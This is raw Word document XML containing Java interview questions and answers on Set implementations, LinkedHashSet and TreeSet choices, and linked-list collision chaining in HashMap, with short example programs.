      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc197867357"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can Set not store duplicate values? Explain internal working?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="78D8EB52" w14:textId="6E476064" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD"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s a collection in Java that does not allow duplicate elements. The key reason behind this behavior is that a Set is based on a mathematica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concept, which only allows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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1119293F"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Most Common Implementation of Set)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D501D8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implementation of the Set interfac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its elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558943A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in a HashSet is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the hashCode() method. This hash value helps in determining the bucket or slot in which the element should be placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF5D47C"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try to add an element to the HashSet, the following steps occur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE558F6"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 code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the element is calculated using its hashCode() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92ACE2"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 is used to find the corresponding bucket (or index) in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF39F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n element with the same hash code already exists in that bucket, it then checks for equalit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4E5E6BE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element i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to an existing element (i.e., hashCode() is the same and equals() returns true), the element is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not added</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D595A"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such element exists, the new element is added to the Set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73399787"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process ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no duplicate elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored in the HashSet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376FAFA"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0686EFB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extends HashSet, and it maintains the insertion order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6D703"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addition to the hash table to store elements in the order in which they were inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789342E9"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ike HashSet, it still ensures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but it also allows you to iterate over the elements in the order they were added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AE705"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39FD924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which is a balanced tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE21B2A"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tores elements in a sorted order according to their natural ordering or based on a comparator passed at the time of creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303904E2"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 are not allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the tree structure ensures that only unique elements (based on the compareTo() method or the comparator) are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D17CA"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B15769">
          <v:rect id="_x0000_i1483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58065103"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Set (HashSet) with No Duplicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EB58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1D6618C4" w14:textId="77777777" w:rsidR="006373CD" w:rsidRPr="00CE4B95" w:rsidRDefault="006373CD" w:rsidP="005F393D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D0D730"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16DC514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27394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Set of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE52B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Set&lt;Integer&gt; set = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48B14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C555A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Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74648E"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7E42507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51168807"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686D4C6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441A1AA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87CB0A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22E3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5D04DB1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 set);  // Output will be [10, 20, 30, 40] (no duplicates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E56B22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FDCBC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04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98E6976"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 [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770C5E8"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you can see, even though we tried to add the number 10 twice, the Set only stores one copy of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6540CD"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E7346B7">
          <v:rect id="_x0000_i1484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373EB6B"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11B0D90"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xml:space="preserve"> The time complexity for add(), remove(), and contains() in a HashSe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of hashing, while the operations in TreeSet are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due to the tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29189EDF"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hashCode() and equals() (in HashSet)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The hashCode() method is used to determine the hash bucket, and if multiple elements fall into the same bucket (hash collision), the equals() method is used to check if the element is already present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093A708"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C9FB6">
          <v:rect id="_x0000_i1485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BA577"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1878B9D"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prevents duplicates because it relies on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for HashSet) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for TreeSet) to maintain unique elements. It internally checks if an element already exists before adding it, using either </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash cod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 method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in HashSet) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comparator methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in TreeSet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D4E12" w14:textId="23F16A0E" w:rsidR="00432ED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d like more details or examples!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC02C67" w14:textId="5D5E764C" w:rsidR="00432EDD" w:rsidRPr="00CE4B95"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86" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DFF10E" w14:textId="77777777" w:rsidR="00322962" w:rsidRPr="00CE4B95" w:rsidRDefault="00322962">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc197867358"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which collection you will use in order to remove duplicate elements and preserve the insertion order?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="50FA26FE" w14:textId="0FC8D4AB" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C5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move duplicate elements and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>preserve the insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, you should us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27B6BB56"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LinkedHashSet?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D9CA6"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s Duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Like other Set implementations,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utomatically eliminates duplicate elements because it doesn't allow duplicates by design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF4DF1"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serves Insertion Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unlike HashSet,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the order in which elements were inserted into the set. This is achieved by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maintain the insertion order in addition to the underlying hash table for efficient lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DF4E4"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inkedHashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B876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Set;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9CF0D3" w14:textId="77777777" w:rsidR="003273E9" w:rsidRPr="00CE4B95" w:rsidRDefault="003273E9" w:rsidP="00845C56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CFD9C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SetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE3266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45E9C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nkedHashSet of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2765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Set&lt;Integer&gt; set = new LinkedHashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163DA7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C099B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LinkedHashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6BC5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5203C618"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75D36FE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4B79651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0B28BBD1"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4B9EFD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328CF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LinkedHashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A57416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HashSet: " + set);  // Output will be [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20755D3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6F647"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A2EB11"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220CCE2"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 [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60CE8B"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FE09F8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llow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nd preserves the order in which elements are inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075519F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is maintained, meaning the order of the elements in the set will be the same as the order in which they were added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D218B5"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ternative Choices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250ABAE3"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g., ArrayList)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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eeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This removes duplicates but does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not preserve insertion order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>; instead, it sorts the elements according to their natural order or a custom comparator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DA7FA9"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your specific requirement (removing duplicates and preserving insertio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is the most appropriate collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34076A4E" w14:textId="5726F3C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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292C402"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5" w:name="_Toc197867359"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which Collection will you avoid duplicating and store data in a sorted manner?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="332CCBEA" w14:textId="2F9D9A3C" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B7062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most appropriate collection in Java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5897AB7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reeSet?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AF8A8"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does not allow duplicate elements. It ensures that only unique elements are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4236D9"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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unlike HashSet or LinkedHashSet,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The elements in a TreeSet are sorted either by their natural order (if they implement Comparable) or by a comparator passed to the set at the time of creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EF94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TreeSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEEC9FB"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Set</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balanced binary search tree). This allows it to maintain a sorted order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C74ED9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The sorting of elements is based on the compareTo() method for natural ordering (if the elements are Comparable), or a custom comparator can be provided to dictate the sorting order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28803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TreeSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB7AB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TreeSet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F0B3B" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACEA6F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reeSetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8CF2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5F5765"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reeSet of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA883D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eeSet&lt;Integer&gt; set = new TreeSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6101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4257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TreeSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EEB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60F8E49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4765B1B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235FC34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2BD32FB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5FD97C4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81ADF9"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TreeSet (elements will be in sorted order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBFE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reeSet: " + set);  // Output will be [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406AD40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556E1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6DDFEB"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F34199A"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 [10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC723FA"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2EBC1167"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Set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ensures that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re stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF45F53"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natural order or custom comparator). For numbers, this means ascending order; for strings, it will be lexicographical order, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF9FB38"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xml:space="preserve">: The operations add(), remove(), and contains() in a TreeSet have a time complexity of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due to the underlying Red-Black tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D278E2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TreeSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71853CD7"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hen you need to store data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hile also ensuring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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7BF9D2"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where sorting is important (e.g., maintaining an ordered list of unique items such as scores, names, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BAE8D" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7062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C6C8A">
          <v:rect id="_x0000_i1488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D43915"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89E96CC" w14:textId="77777777" w:rsidR="003C171D" w:rsidRPr="00CE4B95" w:rsidRDefault="003C171D" w:rsidP="00B70627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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best collection to use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It automatically handles both the elimination of duplicates and sorting of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A770D84" w14:textId="6D26D40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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F6BEE"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6" w:name="_Toc197867360"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In which scenarios Linked list comes into fixture in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="59E858A3" w14:textId="3C200F57" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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omes into the picture when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occur in the map. This scenario is handled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large chains) to store multiple elements that hash to the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D4F2A"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HashMap Internal Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2D1F4"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n array of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lots</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) to store the entries (key-value pairs). Each bucket is chosen based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D535B"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happen when multiple keys have the same hash value and end up in the same bucket. To handle such collisions, Java's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high collision chains) to store these elements in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23C278"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LinkedList Fit into HashMap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE84B76"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or more keys produce the same hash value (i.e., they map to the same bucket), th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stores th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at bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3CDDA"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 bucket is essentially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hat holds the key-value pairs that are hashed to the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CF1D3"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in HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When multiple entries with the same hash code end up in the same bucket, the HashMap resolves this collision by maintain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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1175E606"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stores the key-value pairs, with each entry in the list pointing to the next entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73063AC2"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f Chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510928B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ase of collisions, the time complexity for searching or inserting an elemen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in the worst case, where n is the number of elements in the bucket (due to traversal through the linked list).</w:t>
      </w:r>
    </w:p>
